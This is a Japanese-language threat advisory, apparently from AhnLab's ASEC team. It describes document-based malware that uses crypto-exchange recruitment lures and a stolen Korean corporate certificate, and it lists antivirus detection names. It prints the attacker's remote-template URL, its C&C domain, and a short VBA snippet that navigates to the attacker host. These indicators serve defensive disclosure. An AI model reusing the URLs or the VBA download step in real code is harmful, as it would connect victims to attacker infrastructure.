5月8日、このブログで掲載した内容の通り、メールを通して韓国国内のゲーム企業の証明書を盗用したマルウェアが出回っている件について共有した。当社 ASEC 分析チームでは、この種類のマルウェアが若干変形した形で、依然として様々なタイトルで出回っていることを確認したため、これに関して追加の内容を報告する。
このマルウェアは文書内容に仮想通貨業者の人材募集フォームを使用していた。
また「調整内容」という文書のタイトルを使用して各ユーザーが変更された内容を確認するために文書を閲覧するように誘導するものとみられ、文書タイトルから見たところ、特定の企業に対してそれぞれ異なるタイトルで拡散しているものと推定される。
- 出回っている文書タイトルの形式
– **news調整内容.docx
– 内部調整.docx
– **bit新入社員入力フォーム.docx
このドキュメントの動作構造も、以前の方式と同じである。原本ドキュメントから追加でダウンロードした文書ファイルを通してネットワーク接続を試みる。このときに受け取ったファイルによって最終的に不正な DLL が動作する。
- 変更されたネットワーク接続文書ファイルのダウンロードアドレス
– https://products-msofficeclient.office.microsoft.office-microsoft.cc/officeDocument/office-word.dotm
以前と異なる点は、接続されたドキュメントがマルウェアを内部に持つことによって生成されていたのに対し、今回は外部ネットワークを通してダウンロードすることである。ダウンロードアドレスは以下の VBA コードで示す通り、特定 URL の最後の id はランダム値を使用している。
| Private Sub UserForm_Initialize() asddd.Navigate “www.products-msofficeclient.office.microsoft.office-microsoft.cc/2.html?id=” & Rnd() // Rnd() ランダム関数 End Sub |
最終的に動作する DLL は、従来と同じく msedgeupdate.dll の名前で生成され、MicrosoftEdgeUpdate.exe の正常なファイルにロードされて動作する。この DLL が接続する C&C アドレスは以下のように変更されており、ユーザーの情報を送信する機能を持つ。以降、追加データをダウンロードするものと見られる。
- 変更された C&C アドレス
– https://han.naver2020.me
そして、この DLL は以下の図の通り、依然として韓国国内の大型企業の証明書を装っている。
この種類のマルウェアは、暗号通貨取引所、報道機関、IT 企業を対象に継続的に攻撃を行っているものと見られ、ユーザーは特に注意が必要である。出所が不明な文書ファイルの確認は避けなければならない。
現在 AhnLab V3 では、これらの不正な文書ファイルと DLL ファイルを次のような診断名で診断している。
- Downloader/XML.Generic (2020.05.14.04)
- Dropper/DOC.Generic (2020.05.14.04)
- Trojan/Win32.Agent.C4085977 (2020.05.04.05)
Categories:マルウェアの情報